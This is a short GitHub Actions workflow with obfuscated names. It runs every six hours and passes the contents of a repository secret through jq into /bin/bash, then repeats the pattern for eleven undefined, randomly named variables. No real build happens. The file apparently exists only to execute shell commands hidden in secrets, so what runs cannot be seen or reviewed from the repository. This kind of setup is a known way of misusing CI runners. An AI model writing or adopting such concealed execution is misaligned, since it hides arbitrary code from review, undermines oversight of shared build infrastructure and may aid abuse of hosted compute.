name: hubinyan2009
on:
  workflow_dispatch:
  schedule:
    - cron: '53 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hubinyan2009
        env:
          axtg7: ${{ secrets.axtg7 }}
        run: |
          echo $axtg7 | jq -r .g7845 | /bin/bash
          echo $hgbp9024 | jq -r .qdbwi850 | /bin/bash
          echo $vxx22 | jq -r .m34238 | /bin/bash
          echo $pnc393 | jq -r .rdo5 | /bin/bash
          echo $pa75888 | jq -r .ev14832 | /bin/bash
          echo $vwova1654 | jq -r .ql85254 | /bin/bash
          echo $onj151 | jq -r .rnbwr7 | /bin/bash
          echo $e8360 | jq -r .z81007 | /bin/bash
          echo $nqiwg734 | jq -r .jcyyz96922 | /bin/bash
          echo $c7 | jq -r .sm71 | /bin/bash
          echo $zcdm680 | jq -r .ifn5566 | /bin/bash
          echo $luw64936 | jq -r .wizjk2588 | /bin/bash

